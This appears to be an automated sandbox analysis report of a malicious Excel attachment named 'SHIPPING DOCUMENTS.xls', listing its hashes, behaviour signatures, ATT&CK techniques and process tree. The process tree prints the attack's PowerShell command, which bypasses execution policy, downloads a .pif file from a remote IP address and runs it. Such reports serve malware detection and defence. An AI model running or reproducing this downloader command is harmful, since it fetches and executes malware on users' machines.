Overview

overview

10

Static

static

8

SHIPPING D...TS.xls

windows7-x64

10

SHIPPING D...TS.xls

windows10-2004-x64

10

Analysis

  • max time kernel
    102s
  • max time network
    32s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    23-03-2023 14:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SHIPPING DOCUMENTS.xls

  • Size

    1.5MB

  • MD5

    518e41c69dec599380cccb991d047e16

  • SHA1

    5b061c85b3c5be0079bdc830389f197c059e6f44

  • SHA256

    a26cf1908d8e2e9ab6e9b3fdf31d6cb5d58d7035374cd513b459a1541cc2fc79

  • SHA512

    b7f0e1f2cdb7edda83180262d4bd138f06a24a9335a4e437903806398dbdd25f4170bfe967b1cf476c73a865db3bffdf31a8957ed2683188e9a1aecaf790c761

  • SSDEEP

    24576:w+3bqIKPsoGRwGtt6EaSE8hpaMNzl8raUtGCn113q49zuCr2+zm/E0IEWQNLGBuu:DrtKjG/n6Ead9MNzlMRtGCn113q496CJ

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\SHIPPING DOCUMENTS.xls"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1376
    • C:\Windows\SysWOW64\wscript.exe
      wscript C:\Users\Public\textfile.wsf
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:1096
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "& { Invoke-WebRequest -Uri 'http://37.139.128.83/black/b.pif' -OutFile 'C:\Users\Public\b.pif'; C:\Users\Public\b.pif }"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1960

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

System Information Discovery

2
T1082

Query Registry

1
T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\textfile.wsf
    Filesize

    86B

    MD5

    2955b01463b39ba248cb5b4fbfd8e9ba

    SHA1

    c344f249d03b7e71caecfd77377fb159df195b02

    SHA256

    1995096acdc328fc0af410df38db69ce77f3e0598cfdb8c03561db229f21e797

    SHA512

    007313112bd9a32b7dea45221c8d7dc2d253e6f543d8518062e41bd403fe67d286aa44db3b6027cdfcefb8e2428e14402e20071fb60ffd09a638894bb4edd8a7

    Download Submit
  • memory/1376-64-0x00000000073E0000-0x00000000073F0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1376-60-0x00000000063C0000-0x00000000064C0000-memory.dmp
    Filesize

    1024KB

    Download
  • memory/1376-61-0x00000000073E0000-0x00000000073F0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1376-62-0x00000000073E0000-0x00000000073F0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1376-65-0x00000000073E0000-0x00000000073F0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1376-54-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1376-63-0x00000000073E0000-0x00000000073F0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1376-72-0x00000000063C0000-0x00000000064C0000-memory.dmp
    Filesize

    1024KB

    Download
  • memory/1376-73-0x00000000073E0000-0x00000000073F0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1376-74-0x00000000073E0000-0x00000000073F0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1376-75-0x00000000073E0000-0x00000000073F0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1376-78-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1960-71-0x0000000001BD0000-0x0000000001C10000-memory.dmp
    Filesize

    256KB

    Download